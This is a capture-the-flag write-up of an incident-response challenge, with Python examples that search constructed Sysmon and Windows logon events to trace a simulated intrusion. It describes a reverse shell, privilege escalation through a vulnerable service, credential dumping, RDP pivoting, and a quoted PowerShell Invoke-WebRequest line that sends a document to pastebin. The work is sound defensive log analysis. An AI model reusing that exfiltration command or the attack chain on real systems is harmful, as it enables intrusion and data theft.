Location: Dorm

This could be run in the terminal, but it was also accessible at the following URLs:

Graylog data - https://graylog.elfu.org/
Incident Report - https://report.elfu.org/

The credentials to the former were provided by Pepper Minstix (elfustudent/elfustudent).

The Incident Report questions are shown below; after each answer was entered, a solution was provided:

Question 1

Minty CandyCane reported some weird activity on his computer after he clicked on a link in Firefox for a cookie recipe and downloaded a file.

What is the full-path + filename of the first malicious file downloaded by Minty?

Answer: C:\Users\minty\Downloads\cookie_recipe.exe

We can find this by searching for Sysmon file creation event id 2 with a process named firefox.exe, excluding the junk .temp files. We can use regular expressions to include or exclude patterns, for example:

TargetFilename:/.+.pdf/

Question 2

The malicious file downloaded and executed by Minty gave the attacker remote access to his machine. What was the ip:port the malicious file connected to first?

Answer: 192.168.247.175:4444

We can pivot off the answer to our first question using the binary path as our ProcessImage.

Question 3

What was the first command executed by the attacker?

(answer is a single word)

Answer: whoami

Since all commands (sysmon event id 1) by the attacker are initially running through the cookie_recipe.exe binary, we can set its full-path as our ParentProcessImage to find child processes it creates sorting on timestamp.

Question 4

What is the one-word service name the attacker used to escalate privileges?

Answer: webexservice

Continuing with the cookie_recipe.exe binary as our ParentProcessImage, we should see some more commands later on related to a service.

Question 5

What is the file-path + filename of the binary run by the attacker to dump credentials?

Answer: C:\cookie.exe

The attacker elevates privileges using the vulnerable webexservice to run a file called cookie_recipe2.exe. Let's use this binary path in our ParentProcessImage search.

Question 6

The attacker pivoted to another workstation using credentials gained from Minty's computer. Which account name was used to pivot to another machine?

Answer: alabaster

Windows Event Id 4624 is generated when a user network logon occurs successfully. We can also filter on the attacker's IP using SourceNetworkAddress.

At this point, I noted “the starting host is elfu-res-wks1 at 2019-11-19 05:45:15.000”

Question 7

What is the time ( HH:MM:SS ) the attacker makes a Remote Desktop connection to another machine?

Answer: 06:04:28

LogonType 10 (RemoteInteractive) is logged for successful logons made through the RDP client.

Question 8

The attacker navigates the file system of a third host using their Remote Desktop Connection to the second host. What is the SourceHostName,DestinationHostname,LogonType of this connection?

(submit in that order as csv)

Answer: elfu-res-wks2,elfu-res-wks3,3

The attacker has GUI access to workstation 2 via RDP. They likely use this GUI connection to access the file system of workstation 3 using explorer.exe via UNC file paths (which is why we don't see any cmd.exe or powershell.exe process creates). However, we still see the successful network authentication for this with event id 4624 and logon type 3.
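The logon-event pivoting behind questions 6 to 8, as an added example (not part of the original writeup or the challenge data): a handful of constructed Windows Security 4624 records are filtered by SourceNetworkAddress for the pivot account, by LogonType 10 for the first RDP logon, and by WorkstationName for the onward hop from the second host. The field names follow the Windows 4624 event; the record layout, the non-attacker IP addresses and the extra noise logons are assumptions.

```python
# Windows Security 4624 logon types that matter for the pivot questions.
LOGON_TYPES = {2: "Interactive", 3: "Network", 10: "RemoteInteractive"}

# Constructed 4624 records. "source" is the host that logged the event, i.e. the
# destination of the logon; WorkstationName / SourceNetworkAddress say where it
# came from. Every address other than the attacker's is invented.
ATTACKER_IP = "192.168.247.175"
LOGONS = [
    {"timestamp": "2019-11-19 05:45:15", "source": "elfu-res-wks1", "TargetUserName": "minty",
     "LogonType": 2, "SourceNetworkAddress": "-", "WorkstationName": "elfu-res-wks1"},
    {"timestamp": "2019-11-19 05:50:02", "source": "elfu-res-wks2", "TargetUserName": "svc_backup",
     "LogonType": 3, "SourceNetworkAddress": "10.10.0.5", "WorkstationName": "elfu-backup"},
    {"timestamp": "2019-11-19 05:52:40", "source": "elfu-res-wks2", "TargetUserName": "alabaster",
     "LogonType": 3, "SourceNetworkAddress": ATTACKER_IP, "WorkstationName": "-"},
    {"timestamp": "2019-11-19 06:04:28", "source": "elfu-res-wks2", "TargetUserName": "alabaster",
     "LogonType": 10, "SourceNetworkAddress": ATTACKER_IP, "WorkstationName": "-"},
    {"timestamp": "2019-11-19 06:11:07", "source": "elfu-res-wks3", "TargetUserName": "alabaster",
     "LogonType": 3, "SourceNetworkAddress": "10.10.0.22", "WorkstationName": "elfu-res-wks2"},
]


def by_time(events):
    # zero-padded timestamps, so string order is chronological order
    return sorted(events, key=lambda e: e["timestamp"])


def logons_from_ip(events, ip):
    """Q6: 4624 events whose SourceNetworkAddress is the attacker's IP, oldest first."""
    return [e for e in by_time(events) if e["SourceNetworkAddress"] == ip]


def pivot_account(events, ip):
    """Q6: account name on the first logon that came from the attacker's IP."""
    hits = logons_from_ip(events, ip)
    return hits[0]["TargetUserName"] if hits else None


def first_rdp_time(events):
    """Q7: HH:MM:SS of the first LogonType 10 (RemoteInteractive) logon."""
    for e in by_time(events):
        if e["LogonType"] == 10:
            return e["timestamp"].split(" ")[1]
    return None


def onward_hop(events, from_host):
    """Q8: first logon originating from a host the attacker already controls,
    reported as SourceHostName,DestinationHostname,LogonType."""
    for e in by_time(events):
        if e["WorkstationName"] == from_host and e["source"] != from_host:
            return f"{from_host},{e['source']},{e['LogonType']}"
    return None


def describe(e):
    """One-line rendering of a 4624 record for a timeline."""
    kind = LOGON_TYPES.get(e["LogonType"], e["LogonType"])
    return (f"{e['timestamp']} {e['WorkstationName']}({e['SourceNetworkAddress']}) -> "
            f"{e['source']} as {e['TargetUserName']} [{kind}]")


if __name__ == "__main__":
    for rec in by_time(LOGONS):
        print(describe(rec))
    print(pivot_account(LOGONS, ATTACKER_IP), first_rdp_time(LOGONS),
          onward_hop(LOGONS, "elfu-res-wks2"))
```

The same three filters are what the Graylog searches in the writeup express: SourceNetworkAddress for the pivot, LogonType:10 for the RDP session, and a type 3 logon whose WorkstationName is the host the attacker is sitting on for the explorer.exe/UNC hop that leaves no process-create behind.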

Question 9

What is the full-path + filename of the secret research document after being transferred from the third host to the second host?

Answer: C:\Users\alabaster\Desktop\super_secret_elfu_research.pdf

We can look for Sysmon file creation event id 2 with a source of workstation 2. We can also use regex to filter out overly common file paths using something like:

AND NOT TargetFilename:/.+AppData.+/

Question 10

What is the IPv4 address (as found in logs) the secret research document was exfiltrated to?

Answer: 104.22.3.84

We can look for the original document in CommandLine using regex.

When we do that, we see a long PowerShell command using Invoke-Webrequest to a remote URL of https://pastebin.com/post.php.

We can pivot off of this information to look for a sysmon network connection id of 3 with a source of elfu-res-wks2 and DestinationHostname of pastebin.com.
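The Sysmon pivot chain used for questions 1 to 5 and again for questions 9 and 10, as an added example that is not part of the original writeup or the challenge data: file-create events (id 2) from the browser with temp files excluded, the first network connection (id 3) of that binary, its child process creates (id 1) ordered by time, file creates on the second host with an AppData exclusion, and the command line that names the document pivoted to the network connection for the hostname in its URL. The records are constructed with the field names the writeup searches on (EventID, ProcessImage, ParentProcessImage, TargetFilename, DestinationIp, DestinationPort, DestinationHostname, CommandLine, source); the timestamps, the path of cookie_recipe2.exe and the stand-in command lines are assumptions. Note that the regexes below escape the dot before the extension, whereas the page's `/.+.pdf/` would also match a name such as `xpdf`.

```python
import re

FIREFOX = r"C:\Program Files\Mozilla Firefox\firefox.exe"
DROPPER = r"C:\Users\minty\Downloads\cookie_recipe.exe"
DROPPER2 = r"C:\Users\minty\Downloads\cookie_recipe2.exe"   # path assumed

# Constructed Sysmon records; command lines are stand-ins, not the real ones.
EVENTS = [
    {"EventID": 2, "timestamp": "2019-11-19 05:24:01", "source": "elfu-res-wks1",
     "ProcessImage": FIREFOX, "TargetFilename": r"C:\Users\minty\AppData\Local\Temp\dl.part"},
    {"EventID": 2, "timestamp": "2019-11-19 05:24:02", "source": "elfu-res-wks1",
     "ProcessImage": FIREFOX, "TargetFilename": DROPPER},
    {"EventID": 3, "timestamp": "2019-11-19 05:24:30", "source": "elfu-res-wks1",
     "ProcessImage": DROPPER, "DestinationIp": "192.168.247.175", "DestinationPort": 4444},
    # deliberately listed out of order: the answers depend on sorting by time
    {"EventID": 1, "timestamp": "2019-11-19 05:36:00", "source": "elfu-res-wks1",
     "ParentProcessImage": DROPPER, "CommandLine": "sc query webexservice"},
    {"EventID": 1, "timestamp": "2019-11-19 05:31:00", "source": "elfu-res-wks1",
     "ParentProcessImage": DROPPER, "CommandLine": "whoami"},
    {"EventID": 1, "timestamp": "2019-11-19 05:44:00", "source": "elfu-res-wks1",
     "ParentProcessImage": DROPPER2, "CommandLine": r"C:\cookie.exe"},
    {"EventID": 2, "timestamp": "2019-11-19 06:20:00", "source": "elfu-res-wks2",
     "ProcessImage": r"C:\Windows\explorer.exe",
     "TargetFilename": r"C:\Users\alabaster\AppData\Local\Temp\thumbs.db"},
    {"EventID": 2, "timestamp": "2019-11-19 06:21:00", "source": "elfu-res-wks2",
     "ProcessImage": r"C:\Windows\explorer.exe",
     "TargetFilename": r"C:\Users\alabaster\Desktop\super_secret_elfu_research.pdf"},
    {"EventID": 1, "timestamp": "2019-11-19 06:25:00", "source": "elfu-res-wks2",
     "ParentProcessImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell.exe Invoke-WebRequest https://pastebin.com/post.php ... "
                    r"C:\Users\alabaster\Desktop\super_secret_elfu_research.pdf"},
    {"EventID": 3, "timestamp": "2019-11-19 06:25:02", "source": "elfu-res-wks2",
     "ProcessImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "DestinationHostname": "pastebin.com", "DestinationIp": "104.22.3.84", "DestinationPort": 443},
]

TEMP_FILE = re.compile(r"\.(tmp|temp|part)$", re.IGNORECASE)


def by_time(events):
    # zero-padded timestamps, so string order is chronological order
    return sorted(events, key=lambda e: e["timestamp"])


def first_download(events, browser="firefox.exe"):
    """Q1: earliest FileCreate (id 2) written by the browser, temp files excluded."""
    for e in by_time(events):
        if (e["EventID"] == 2 and e.get("ProcessImage", "").lower().endswith(browser)
                and not TEMP_FILE.search(e["TargetFilename"])):
            return e["TargetFilename"]
    return None


def first_connection(events, image):
    """Q2: earliest NetworkConnect (id 3) whose ProcessImage is the given binary."""
    for e in by_time(events):
        if e["EventID"] == 3 and e.get("ProcessImage") == image:
            return f"{e['DestinationIp']}:{e['DestinationPort']}"
    return None


def child_commands(events, parent_image):
    """Q3-Q5: ProcessCreate (id 1) children of parent_image, oldest first."""
    return [e["CommandLine"] for e in by_time(events)
            if e["EventID"] == 1 and e.get("ParentProcessImage") == parent_image]


def files_created_on(events, host, exclude=r".+AppData.+"):
    """Q9: FileCreate events logged by one host, minus paths matching the exclusion regex."""
    noise = re.compile(exclude)
    return [e["TargetFilename"] for e in by_time(events)
            if e["EventID"] == 2 and e["source"] == host and not noise.search(e["TargetFilename"])]


def exfil_destination(events, document_regex):
    """Q10: find the command line naming the document, take the hostname from its URL,
    then pivot to the NetworkConnect from the same host to that hostname."""
    doc = re.compile(document_regex)
    for cmd in by_time(events):
        if cmd["EventID"] != 1 or not doc.search(cmd.get("CommandLine", "")):
            continue
        url_host = re.search(r"https?://([^/\s]+)", cmd["CommandLine"])
        for net in by_time(events):
            if (url_host and net["EventID"] == 3 and net["source"] == cmd["source"]
                    and net.get("DestinationHostname") == url_host.group(1)):
                return net["DestinationIp"]
    return None


def investigate(events):
    """Run the whole pivot chain and return the answers keyed by question."""
    dropper = first_download(events)
    children = child_commands(events, dropper)
    return {
        "q1_first_file": dropper,
        "q2_first_ipport": first_connection(events, dropper),
        "q3_first_command": children[0].split()[0],
        "q4_service": next(w for c in children for w in c.split() if "service" in w),
        "q5_cred_dumper": child_commands(events, DROPPER2)[0],
        "q9_document": files_created_on(events, "elfu-res-wks2")[0],
        "q10_exfil_ip": exfil_destination(events, r"super_secret_elfu_research\.pdf"),
    }


if __name__ == "__main__":
    print(investigate(EVENTS))
```

Each function is the programmatic form of one Graylog search from the writeup: the value returned by one step (the download path, the binary, the host) becomes the filter for the next, which is the pivoting the solutions describe.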